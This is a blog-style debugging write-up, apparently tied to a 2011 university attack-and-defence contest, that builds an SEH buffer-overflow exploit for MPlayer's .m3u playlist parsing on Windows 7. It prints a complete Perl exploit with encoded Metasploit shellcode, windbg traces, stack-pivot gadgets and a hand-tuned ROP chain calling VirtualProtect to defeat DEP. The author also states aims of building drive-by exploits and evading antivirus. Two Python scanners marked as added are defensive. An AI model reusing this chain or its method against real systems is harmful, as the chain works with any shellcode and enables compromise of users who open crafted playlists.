2011 Xidian University Network Attack and Defense Competition, vulnerability discovery challenge: Windows 7 SEH exploit DEP bypass debugging notes

Web-exploit (drive-by) research directions I planned to look into last time:

1. How to quickly develop drive-by exploits that bypass DEP
2. Decrypt and analyze how some very effective shellcodes are written, e.g. shellcode that does not rely on download-and-execute
3. How to evade anti-virus detection
4. Analyze how Java and Flash are used to bypass ASLR and DEP on Windows 7

Recently, by debugging an old drive-by exploit and writing the exploit myself, I got the XP SP3 IE6/IE7 and XP SP3 + IE8 DEP bypass working on the cn, tw, en and kr builds, as well as an ASLR and DEP bypass on Windows 7 + JRE6. Through this debugging I have basically grasped the exploitation principles behind the popular drive-by kits; a few points are still unclear, and my next step is to read the classic papers and do more hands-on debugging. I also learned something about item 3: it is usually code substitution and encryption, Flash wrapping and the like.

For item 2, I will pick a good shellcode and trace through it this weekend. For item 4, I hear that memory allocated by some Flash versions is executable? Something to look into later.

Since the Windows 7 environment is already set up, let me finish the Windows 7 SEH DEP bypass challenge I left half-done last time. It only takes a small change to the XP exploit from last time.

#!/usr/bin/perl
# 2011 Xidian University Network Attack and Defense Competition, vulnerability discovery challenge: SEH exploit for Windows 7 DEP bypass, poc0
# by c4rp3nt3r@0x50sec.org
#
# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc
my $load =
"\xba\xa3\xfd\xdd\x88\xd9\xf7\xd9\x74\x24\xf4\x5f\x31\xc9" .
"\xb1\x32\x31\x57\x12\x83\xef\xfc\x03\xf4\xf3\x3f\x7d\x06" .
"\xe3\x49\x7e\xf6\xf4\x29\xf6\x13\xc5\x7b\x6c\x50\x74\x4c" .
"\xe6\x34\x75\x27\xaa\xac\x0e\x45\x63\xc3\xa7\xe0\x55\xea" .
"\x38\xc5\x59\xa0\xfb\x47\x26\xba\x2f\xa8\x17\x75\x22\xa9" .
"\x50\x6b\xcd\xfb\x09\xe0\x7c\xec\x3e\xb4\xbc\x0d\x91\xb3" .
"\xfd\x75\x94\x03\x89\xcf\x97\x53\x22\x5b\xdf\x4b\x48\x03" .
"\xc0\x6a\x9d\x57\x3c\x25\xaa\xac\xb6\xb4\x7a\xfd\x37\x87" .
"\x42\x52\x06\x28\x4f\xaa\x4e\x8e\xb0\xd9\xa4\xed\x4d\xda" .
"\x7e\x8c\x89\x6f\x63\x36\x59\xd7\x47\xc7\x8e\x8e\x0c\xcb" .
"\x7b\xc4\x4b\xcf\x7a\x09\xe0\xeb\xf7\xac\x27\x7a\x43\x8b" .
"\xe3\x27\x17\xb2\xb2\x8d\xf6\xcb\xa5\x69\xa6\x69\xad\x9b" .
"\xb3\x08\xec\xf1\x42\x98\x8a\xbc\x45\xa2\x94\xee\x2d\x93" .
"\x1f\x61\x29\x2c\xca\xc6\xc5\x66\x57\x6e\x4e\x2f\x0d\x33" .
"\x13\xd0\xfb\x77\x2a\x53\x0e\x07\xc9\x4b\x7b\x02\x95\xcb" .
"\x97\x7e\x86\xb9\x97\x2d\xa7\xeb\xfb\xb0\x3b\x77\xfc";
my $length = 5149 - length($load);
my $junk = "\x90" x $length;           # NOP padding up to the SEH record
my $nseh = "\xeb\x06\x90\x90";         # short jmp +6 over the SEH pointer
my $seh = pack('V',0x6ad410b4);        # pop pop ret from avcodec-52.dll
my $pay = "\xe9\x0c\xff\xff\xff";      # jmp back to shellcode
open($FH,">exp.m3u");
print $FH $junk.$load.$nseh.$seh.$pay."\r\n";
close($FH);

Locating the overflow point showed that on Windows 7 the offset at which the exception handler structure gets overwritten is actually different from XP. As above, the bytes after position 5149 overwrite the exception handler structure on the stack.

Attach windbg to mplayer and drag the exp.m3u generated above into the mplayer window. windbg catches the exception before the exception handler structure comes into play.
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=90909090 ebx=0022ea84 ecx=0022e68c edx=0022e944 esi=90909091 edi=0022e944
eip=777158d4 esp=0022e678 ebp=0022e67c iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
ntdll!RtlInitAnsiStringEx+0x1f:
777158d4 8a10            mov     dl,byte ptr [eax]          ds:0023:90909090=??
Check that the exception handler structure was successfully overwritten, then set a breakpoint on the pop pop ret address and trace to see how this differs from XP.
0:000> !exchain
0022ffc4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Users/Administrator/Desktop/mplayer/avcodec-52.dll -
avcodec_52+10b4 (6ad410b4)
Invalid exception stack at 909006eb
0:000> bp 6ad410b4
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Windows/system32/KERNELBASE.dll -

Let the exception handler structure we overwrote handle the exception: we successfully land at our pop pop ret address.
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6ad410b4 edx=7770720d esi=00000000 edi=00000000
eip=6ad410b4 esp=0022e290 ebp=0022e2b0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_52+0x10b4:
6ad410b4 5b              pop     ebx
0:000> t
eax=00000000 ebx=777071f9 ecx=6ad410b4 edx=7770720d esi=00000000 edi=00000000
eip=6ad410b5 esp=0022e294 ebp=0022e2b0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_52+0x10b5:
6ad410b5 5d              pop     ebp
0:000> t
eax=00000000 ebx=777071f9 ecx=6ad410b4 edx=7770720d esi=00000000 edi=00000000
eip=6ad410b6 esp=0022e298 ebp=0022e378 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_52+0x10b6:
6ad410b6 c3              ret

Below we can see that at this point the address stored at esp is our eb 06 90 90.
0:000> d esp
0022e298  c4 ff 22 00 94 e3 22 00-4c e3 22 00 c4 ff 22 00  .."...".L."...".
0022e2a8  0d 72 70 77 c4 ff 22 00-60 e3 22 00 cb 71 70 77  .rpw..".`."..qpw
0022e2b8  78 e3 22 00 c4 ff 22 00-94 e3 22 00 4c e3 22 00  x."..."...".L.".
0022e2c8  b4 10 d4 6a 00 00 00 00-78 e3 22 00 c4 ff 22 00  ...j....x."...".
0022e2d8  87 f9 6d 77 78 e3 22 00-c4 ff 22 00 94 e3 22 00  ..mwx."..."...".
0022e2e8  4c e3 22 00 b4 10 d4 6a-44 e9 22 00 78 e3 22 00  L."....jD.".x.".
0022e2f8  91 90 90 90 00 00 00 00-00 00 00 00 00 00 00 00  ................
0022e308  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
0:000> u 0022ffc4
0022ffc4 eb06            jmp     0022ffcc
0022ffc6 90              nop
0022ffc7 90              nop
0022ffc8 b410            mov     ah,10h
0022ffca d46a            aamb    6Ah
0022ffcc e90cffffff      jmp     0022fedd
0022ffd1 0000            add     byte ptr [eax],al
0022ffd3 00ec            add     ah,ch
0:000> t
eax=00000000 ebx=777071f9 ecx=6ad410b4 edx=7770720d esi=00000000 edi=00000000
eip=0022ffc4 esp=0022e29c ebp=0022e378 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
0022ffc4 eb06            jmp     0022ffcc

Continuing produces an access violation: because DEP is enabled we cannot keep executing shellcode on the stack.
0:000> t
(e84.19c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=777071f9 ecx=6ad410b4 edx=7770720d esi=00000000 edi=00000000
eip=0022ffc4 esp=0022e29c ebp=0022e378 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
0022ffc4 eb06            jmp     0022ffcc

Next we bypass DEP with ROP.

When SEH dispatches an exception it first zeroes several registers, so no register is left pointing at a string we control.
We first adjust the stack so that the ROP chain we lay out can run.
0:000> d esp+200
0022e49c  00 00 00 00 00 00 00 00-00 00 00 00 ff ff 00 00  ................
0022e4ac  00 00 00 00 88 88 88 88-88 88 88 88 ff ff 00 00  ................
0022e4bc  00 00 00 00 00 00 00 00-00 00 00 00 ff ff 00 00  ................
0022e4cc  00 00 00 00 ff 00 ff 00-ff 00 ff 00 ff ff 00 00  ................
0022e4dc  00 00 00 00 00 d0 cc cc-cc cc cc cc fb 3f 00 00  .............?..
0022e4ec  00 00 00 00 00 00 00 00-00 00 00 a0 f7 3f 00 00  .............?..
0022e4fc  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
0022e50c  00 00 00 00 97 53 22 5b-df 4b 48 03 c0 6a 9d 57  .....S"[.KH..j.W
0:000> d esp+500
0022e79c  00 00 c1 00 15 e1 6d 77-2a 1d 01 01 8c e7 22 00  ......mw*.....".
0022e7ac  c4 68 78 77 a4 e8 22 00-15 e1 6d 77 2a 1d 34 00  .hxw.."...mw*.4.
0022e7bc  fe ff ff ff c4 68 78 77-3e a1 74 77 00 00 c1 00  .....hxw>.tw....
0022e7cc  63 00 00 50 70 65 71 77-46 e8 67 77 01 00 00 00  c..PpeqwF.gw....
0022e7dc  00 00 00 00 1c e8 22 00-ba ea 95 75 59 04 00 00  ......"....uY...
0022e7ec  2a 00 00 00 00 01 00 00-df 82 95 75 00 00 00 00  *..........u....
0022e7fc  1c 00 fa 7f 00 00 00 00-05 e9 22 00 00 00 00 00  ..........".....
0022e80c  f5 f8 00 00 b4 e8 22 00-f2 70 71 77 a0 95 9f d3  ......"..pqw....
0:000> d esp+1000
0022f29c  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2ac  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2bc  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2cc  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2dc  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2ec  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2fc  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f30c  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................

At esp+1000 our shellcode appears.
The address we need to find is a gadget like the following: # add esp,1000 # retn.

For finding ROP gadgets, the tool of choice is of course the Corelan Team's mona + Immunity Debugger.

The module info is as follows:
----------------------------------------------------------------------------------------------------------------------------------
Module info :
----------------------------------------------------------------------------------------------------------------------------------
Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
----------------------------------------------------------------------------------------------------------------------------------
0x6a0d0000 | 0x6a105000 | 0x00035000 | True   | True    | True  |  True    | False  | 4.0.4 [unrar.dll] (C:/Users/Administrator/Desktop/mplayer_release/mplayer/unrar.dll)
0x73d10000 | 0x73d16000 | 0x00006000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [DCIMAN32.dll] (C:/Windows/system32/DCIMAN32.dll)
0x6ad40000 | 0x6b72e000 | 0x009ee000 | False  | False   | False |  False   | False  | -1.0- [avcodec-52.dll] (C:/Users/Administrator/Desktop/mplayer_release/mplayer/avcodec-52.dll)
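As an added example (not part of the original notes and not mona's own code), the following Python parses the module table above and reports which loaded modules lack the listed mitigations; this is the defender-side check that shows avcodec-52.dll as the weak link, and that the kernel32 pointer used later lies outside it. The helper names are my own.

```python
import re

# Sample mona "Module info" rows, constructed from the three lines quoted above.
MODULE_TABLE = """\
Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
----------------------------------------------------------------------------------------------------------------------------------
0x6a0d0000 | 0x6a105000 | 0x00035000 | True   | True    | True  |  True    | False  | 4.0.4 [unrar.dll] (C:/Users/Administrator/Desktop/mplayer_release/mplayer/unrar.dll)
0x73d10000 | 0x73d16000 | 0x00006000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [DCIMAN32.dll] (C:/Windows/system32/DCIMAN32.dll)
0x6ad40000 | 0x6b72e000 | 0x009ee000 | False  | False   | False |  False   | False  | -1.0- [avcodec-52.dll] (C:/Users/Administrator/Desktop/mplayer_release/mplayer/avcodec-52.dll)
"""

FLAG_COLUMNS = ("rebase", "safeseh", "aslr", "nxcompat", "os_dll")
MITIGATIONS = ("rebase", "safeseh", "aslr", "nxcompat")   # OS Dll is informational only


def parse_module_table(text):
    """Parse mona's pipe-separated module rows into dicts; header and rule lines are skipped."""
    modules = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 9 or not cells[0].startswith("0x"):
            continue
        name = re.search(r"\[([^\]]+)\]", cells[8])
        mod = {
            "base": int(cells[0], 16),
            "top": int(cells[1], 16),
            "size": int(cells[2], 16),
            "name": name.group(1) if name else cells[8],
        }
        for col, cell in zip(FLAG_COLUMNS, cells[3:8]):
            mod[col] = (cell == "True")
        modules.append(mod)
    return modules


def missing_mitigations(mod):
    """Return the mitigation flags this module was built without."""
    return [c for c in MITIGATIONS if not mod[c]]


def weak_modules(text):
    """Map module name -> missing mitigations, for every module missing at least one."""
    result = {}
    for mod in parse_module_table(text):
        missing = missing_mitigations(mod)
        if missing:
            result[mod["name"]] = missing
    return result


def module_containing(modules, address):
    """Name of the module whose [base, top) range holds address, or None if no listed module does."""
    for mod in modules:
        if mod["base"] <= address < mod["top"]:
            return mod["name"]
    return None


if __name__ == "__main__":
    for name, missing in weak_modules(MODULE_TABLE).items():
        print(f"{name}: missing {', '.join(missing)}")
```

Run against a full mona module list, the same check flags every non-rebased, non-ASLR module a process loads, which is exactly the set an attacker would pick gadgets from.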

Using addresses from avcodec-52.dll we can bypass Windows 7 ASLR + DEP + SafeSEH.
After attaching the debugger to the process, run !mona rop -m avcodec-52.dll -n

In the generated stackpivot.txt, find

0x6afc7973 : {pivot 2204 / 0x89c} :  # ADD ESP,88C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-52.dll] **   |   {PAGE_EXECUTE_WRITECOPY}

During testing I found that the .m3u file handles some special characters: for example 0x23 is #, which is treated as a comment, and 2e (the dot) is also processed.

0:000> !exchain
0022ffc4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Users/Administrator/Desktop/mplayer/avcodec-52.dll -
avcodec_52!ff_vorbis_floor1_render_list+2d33 (6afc7973)
Invalid exception stack at 43434343
0:000> bp 6afc7973
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Windows/system32/KERNELBASE.dll -
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afc7973 edx=7770720d esi=00000000 edi=00000000
eip=6afc7973 esp=0022e290 ebp=0022e2b0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_52!ff_vorbis_floor1_render_list+0x2d33:
6afc7973 81c48c080000    add     esp,88Ch
0:000> u eip
avcodec_52!ff_vorbis_floor1_render_list+0x2d33:
6afc7973 81c48c080000    add     esp,88Ch
6afc7979 5b              pop     ebx
6afc797a 5e              pop     esi
6afc797b 5f              pop     edi
6afc797c 5d              pop     ebp
6afc797d c3              ret
6afc797e b801000000      mov     eax,1
6afc7983 ebee            jmp     avcodec_52!ff_vorbis_floor1_render_list+0x2d33 (6afc7973)
0:000> t
eax=00000000 ebx=00000000 ecx=6afc7973 edx=7770720d esi=00000000 edi=00000000
eip=6afc7979 esp=0022eb1c ebp=0022e2b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
avcodec_52!ff_vorbis_floor1_render_list+0x2d39:
6afc7979 5b              pop     ebx
0:000>
eax=00000000 ebx=31666130 ecx=6afc7973 edx=7770720d esi=00000000 edi=00000000
eip=6afc797a esp=0022eb20 ebp=0022e2b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
avcodec_52!ff_vorbis_floor1_render_list+0x2d3a:
6afc797a 5e              pop     esi
0:000>
eax=00000000 ebx=31666130 ecx=6afc7973 edx=7770720d esi=61326661 edi=00000000
eip=6afc797b esp=0022eb24 ebp=0022e2b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
avcodec_52!ff_vorbis_floor1_render_list+0x2d3b:
6afc797b 5f              pop     edi
0:000>
eax=00000000 ebx=31666130 ecx=6afc7973 edx=7770720d esi=61326661 edi=66613366
eip=6afc797c esp=0022eb28 ebp=0022e2b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
avcodec_52!ff_vorbis_floor1_render_list+0x2d3c:
6afc797c 5d              pop     ebp
0:000>
eax=00000000 ebx=31666130 ecx=6afc7973 edx=7770720d esi=61326661 edi=66613366
eip=6afc797d esp=0022eb2c ebp=35666134 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
avcodec_52!ff_vorbis_floor1_render_list+0x2d3d:
6afc797d c3              ret
0:000> d esp
0022eb2c  61 66 36 61 66 37 61 66-38 61 66 39 61 67 30 61  af6af7af8af9ag0a
0022eb3c  67 31 61 67 32 61 67 33-61 67 34 61 67 35 61 67  g1ag2ag3ag4ag5ag
0022eb4c  36 61 67 37 61 67 38 61-67 39 61 68 30 61 68 31  6ag7ag8ag9ah0ah1
0022eb5c  61 68 32 61 68 33 61 68-34 61 68 35 61 68 36 61  ah2ah3ah4ah5ah6a
0022eb6c  68 37 61 68 38 61 68 39-61 69 30 61 69 31 61 69  h7ah8ah9ai0ai1ai
0022eb7c  32 61 69 33 61 69 34 61-69 35 61 69 36 61 69 37  2ai3ai4ai5ai6ai7
0022eb8c  61 69 38 61 69 39 61 6a-30 61 6a 31 61 6a 32 61  ai8ai9aj0aj1aj2a
0022eb9c  6a 33 61 6a 34 61 6a 35-61 6a 36 00 6a 37 41 6a  j3aj4aj5aj6.j7Aj
0:000> t
eax=00000000 ebx=31666130 ecx=6afc7973 edx=7770720d esi=61326661 edi=66613366
eip=61366661 esp=0022eb30 ebp=35666134 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
61366661 ??              ???

Find its position:
root@scan:~# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb af6a
[*] No exact matches, looking for likely candidates...
Our generated string does not contain af6a at all. The reason is that the program converted our characters to lowercase. The length also seems insufficient: a 00 byte appears not far below. Further down, the original uppercase letters appear.
0:000> d esp
0022eb30  66 37 61 66 38 61 66 39-61 67 30 61 67 31 61 67  f7af8af9ag0ag1ag
0022eb40  32 61 67 33 61 67 34 61-67 35 61 67 36 61 67 37  2ag3ag4ag5ag6ag7
0022eb50  61 67 38 61 67 39 61 68-30 61 68 31 61 68 32 61  ag8ag9ah0ah1ah2a
0022eb60  68 33 61 68 34 61 68 35-61 68 36 61 68 37 61 68  h3ah4ah5ah6ah7ah
0022eb70  38 61 68 39 61 69 30 61-69 31 61 69 32 61 69 33  8ah9ai0ai1ai2ai3
0022eb80  61 69 34 61 69 35 61 69-36 61 69 37 61 69 38 61  ai4ai5ai6ai7ai8a
0022eb90  69 39 61 6a 30 61 6a 31-61 6a 32 61 6a 33 61 6a  i9aj0aj1aj2aj3aj
0022eba0  34 61 6a 35 61 6a 36 00-6a 37 41 6a 38 41 6a 39  4aj5aj6.j7Aj8Aj9
0:000> d
0022ebb0  41 6b 30 41 6b 31 41 6b-32 41 6b 33 41 6b 34 41  Ak0Ak1Ak2Ak3Ak4A
0022ebc0  6b 35 41 6b 36 41 6b 37-41 6b 38 41 6b 39 41 6c  k5Ak6Ak7Ak8Ak9Al
0022ebd0  30 41 6c 31 41 6c 32 41-6c 33 41 6c 34 41 6c 35  0Al1Al2Al3Al4Al5
0022ebe0  41 6c 36 41 6c 37 41 6c-38 41 6c 39 41 6d 30 41  Al6Al7Al8Al9Am0A
0022ebf0  6d 31 41 6d 32 41 6d 33-41 6d 34 41 6d 35 41 6d  m1Am2Am3Am4Am5Am
0022ec00  36 41 6d 37 41 6d 38 41-6d 39 41 6e 30 41 6e 31  6Am7Am8Am9An0An1
0022ec10  41 6e 32 41 6e 33 41 6e-34 41 6e 35 41 6e 36 41  An2An3An4An5An6A
0022ec20  6e 37 41 6e 38 41 6e 39-41 6f 30 41 6f 31 41 6f  n7An8An9Ao0Ao1Ao
0:000>
0022ec30  32 41 6f 33 41 6f 34 41-6f 35 41 6f 36 41 6f 37  2Ao3Ao4Ao5Ao6Ao7
0022ec40  41 6f 38 41 6f 39 41 70-30 41 70 31 41 70 32 41  Ao8Ao9Ap0Ap1Ap2A
0022ec50  70 33 41 70 34 41 70 35-41 70 36 41 70 37 41 70  p3Ap4Ap5Ap6Ap7Ap
0022ec60  38 41 70 39 41 71 30 41-71 31 41 71 32 41 71 33  8Ap9Aq0Aq1Aq2Aq3
0022ec70  41 71 34 41 71 35 41 71-36 41 71 37 41 71 38 41  Aq4Aq5Aq6Aq7Aq8A
0022ec80  71 39 41 72 30 41 72 31-41 72 32 41 72 00 41 72  q9Ar0Ar1Ar2Ar.Ar
0022ec90  34 41 72 35 41 72 36 41-72 37 41 72 38 41 72 39  4Ar5Ar6Ar7Ar8Ar9
0022eca0  41 73 30 41 73 31 41 73-32 41 73 33 41 73 34 41  As0As1As2As3As4A

Above we can see that the length is also enough to hold the ROP chain and shellcode. We just need to move esp a bit further up; it does not have to be exact.

Find a larger pivot

my $seh = pack('V',0x6af51dc2 );

Using the method above, locate the offset of the adjusted esp within the pattern string
root@scan:~# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb 0Gb1
[*] Exact match at offset 4712

So far our exploit layout should look like this

[junk 4712 bytes] [ROP chain][jmp esp address][shellcode][junk, 5149 bytes in total with the preceding parts] [nseh garbage filler] [0x6af51dc2 stack adjust]
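As an added, defender-side example (not part of the original notes), here is a small Python scanner that splits a .m3u into entries with the '#' comment handling mentioned earlier and flags any entry shaped like this layout: oversized, containing a long run of 0x90, or dense with little-endian pointers into the non-ASLR avcodec-52.dll range from the module table. The thresholds and both sample playlists are constructed assumptions; the in-range dwords in the suspicious sample are placeholders, not gadgets.

```python
import struct

# Address range of avcodec-52.dll from the mona module table (no ASLR, no SafeSEH).
AVCODEC_RANGE = (0x6ad40000, 0x6b72e000)
MAX_ENTRY_LEN = 1024   # assumed threshold: real playlist paths are far shorter
MIN_SLED = 32          # assumed: this many consecutive 0x90 bytes counts as a NOP sled
MIN_POINTERS = 4       # assumed: this many in-range dwords counts as a chain-like run


def m3u_entries(data):
    """Yield playlist entries, skipping blank lines and '#' (0x23) comment lines."""
    for raw in data.split(b"\n"):
        entry = raw.rstrip(b"\r")
        if not entry or entry.startswith(b"#"):
            continue
        yield entry


def longest_nop_run(entry):
    """Length of the longest run of 0x90 bytes in the entry."""
    run = best = 0
    for b in entry:
        run = run + 1 if b == 0x90 else 0
        best = max(best, run)
    return best


def count_pointers(entry, lo, hi):
    """Count 4-byte little-endian words, at every byte offset, that fall inside [lo, hi)."""
    hits = 0
    for i in range(len(entry) - 3):
        if lo <= struct.unpack_from("<I", entry, i)[0] < hi:
            hits += 1
    return hits


def scan_playlist(data):
    """Return one finding per entry that looks like an overflow payload rather than a path."""
    findings = []
    for n, entry in enumerate(m3u_entries(data), 1):
        reasons = []
        if len(entry) > MAX_ENTRY_LEN:
            reasons.append(f"entry length {len(entry)}")
        sled = longest_nop_run(entry)
        if sled >= MIN_SLED:
            reasons.append(f"nop sled of {sled} bytes")
        ptrs = count_pointers(entry, *AVCODEC_RANGE)
        if ptrs >= MIN_POINTERS:
            reasons.append(f"{ptrs} pointers into avcodec-52.dll")
        if reasons:
            findings.append({"entry": n, "reasons": reasons})
    return findings


# Constructed samples: a benign playlist, and one shaped like the layout above
# (junk, placeholder in-module dwords, more junk, nSEH filler, SEH dword).
BENIGN = b"#EXTM3U\r\n#EXTINF:180,Track One\r\nC:\\Music\\song01.mp3\r\n"
FAKE_CHAIN = b"".join(struct.pack("<I", 0x6ad40000 + 0x1000 * i) for i in range(8))
SUSPICIOUS = (b"\x90" * 4712 + FAKE_CHAIN
              + b"\x90" * (5149 - 4712 - len(FAKE_CHAIN))
              + b"CCCC" + struct.pack("<I", 0x6ad40000 + 0x2000) + b"\r\n")

if __name__ == "__main__":
    print(scan_playlist(BENIGN))
    print(scan_playlist(SUSPICIOUS))
```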

Now let's build our ROP chain.
Open the rop_chains.txt just generated by
!mona rop -m avcodec-52.dll -n

Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD

……
ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
*** [ Python ] ***

import struct

def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = ""
    rop_gadgets += struct.pack('<L',0x00000000)  # [-] Unable to find API pointer -> eax
    rop_gadgets += struct.pack('<L',0x6ae8f378)  # MOV EAX,DWORD PTR DS:[EAX] # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6afda261)  # XCHG EAX,ESI # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6ae27a6d)  # POP EBP # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6afae347)  # & jmp esp [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6b028274)  # POP EAX # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0xfffffdff)  # Value to negate, will become 0x00000201
    rop_gadgets += struct.pack('<L',0x6b0ce791)  # NEG EAX # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6b01e85e)  # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (compensate)
    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (compensate)
    rop_gadgets += struct.pack('<L',0x6b028274)  # POP EAX # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0xffffffc0)  # Value to negate, will become 0x00000040
    rop_gadgets += struct.pack('<L',0x6b0ce791)  # NEG EAX # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6ae63239)  # XCHG EAX,EDX # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6aed7baf)  # POP ECX # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6b71ba09)  # &Writable location [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6b0308b8)  # POP EDI # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6b059081)  # RETN (ROP NOP) [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x6b02836d)  # POP EAX # RETN [avcodec-52.dll]
    rop_gadgets += struct.pack('<L',0x90909090)  # nop
    rop_gadgets += struct.pack('<L',0x6ad7a043)  # PUSHAD # RETN [avcodec-52.dll]
    return rop_gadgets

The ROP chain above is a half-finished product and needs manual adjustment. We build the ROP using the first register setup.

my $rop_gadgets = pack('V',0x6aee6245); # POP EBP # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6aee6245); # Filler (compensate)
$rop_gadgets .= pack('V',0x6adc122d); # POP EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0xfffffdff); # Value to negate, will become 0x00000201
$rop_gadgets .= pack('V',0x6b0ce791); # NEG EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6adb16a5); # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x77b52c15); # ptr to &VirtualProtect() kernel32 // hard-coded
$rop_gadgets .= pack('V',0x41414141); # Filler (compensate)
$rop_gadgets .= pack('V',0x6b02836d); # POP EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0xffffffc0); # Value to negate, will become 0x00000040
$rop_gadgets .= pack('V',0x6b0ce791); # NEG EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6ae63239); # XCHG EAX,EDX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6af63467); # POP ECX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6b19add4); # &Writable location [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6b026a8c); # POP EDI # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6b05908b); # RETN (ROP NOP) [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6b028274); # POP EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x90909090); # nop
$rop_gadgets .= pack('V',0x6b0665a2); # PUSHAD # RETN [avcodec-52.dll]
$rop_gadgets .= pack('V',0x6afae368); # & jmp esp [avcodec-52.dll]

It is actually fairly simple: EDI holds a RET instruction and ESI holds the address of VirtualProtect. When the program returns into VirtualProtect, the stack has been adjusted so that esp points at the junk data in EAX; the return address is the one placed in EBP, so POP EBP # RETN executes, pops the EAX junk, then executes jmp esp and enters our shellcode.

